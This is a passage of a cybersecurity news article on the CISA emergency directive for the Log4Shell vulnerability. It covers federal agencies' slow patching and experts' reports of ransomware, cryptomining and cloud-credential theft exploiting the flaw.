Federal agencies have particular vulnerabilities due to their reliance on legacy technology and have often failed to patch and supply timely security updates to existing systems.
“The CISA emergency directive is important because many agencies at the U.S. government have been slow to patch and a vulnerability like Log4Shell can have lasting effects if not properly addressed quickly,” Koehler said. 
Koehler cited an August 2021 report from the Senate Committee on Homeland Security and Government Affairs report which noted that six agencies failed to install patches and take other important measures two years after a 2019 report from the inspector general.
Seven agencies used legacy systems or applications that were no longer being supported with security updates, according to the report from Sens. Rob Portman, R-Ohio, and Gary Peters, D-Mich.
The concerns about Log4Shell are rising amid reports that threat actors are deploying Conti ransomware and installing cryptominers on vulnerable systems, Koehler said. 
Similar to the Microsoft Exchange attacks earlier this year, the threats related to Log4Shell are escalating from the initial set of probes and coin mining, to exfiltration and ransomware, said Saumitra Das, CTO and co-founder of Blue Hexagon. 
“Since ransomware initial access brokers typically already have foothold infections in enterprises, I fully expect them to scan internal hosts for Log4j vulnerabilities and use it to spread and deploy ransomware,” Das said. 
Organizations should not limit their search for signs of exploitation to just external locations but also check internally and in cloud environments. Log4j has also been used to steal cloud credentials like AWS keys as well, Das said. 
Get the free daily newsletter read by industry experts
The biggest and baddest ransomware groups love an easy vulnerability.
More than 80% of developers knowingly release applications with insecure code, but experts say security and development don't have to be at odds.
Subscribe to Cybersecurity Dive for top news, trends & analysis
Get the free daily newsletter read by industry experts
The biggest and baddest ransomware groups love an easy vulnerability.
More than 80% of developers knowingly release applications with insecure code, but experts say security and development don't have to be at odds.
The free newsletter covering the top industry headlines

source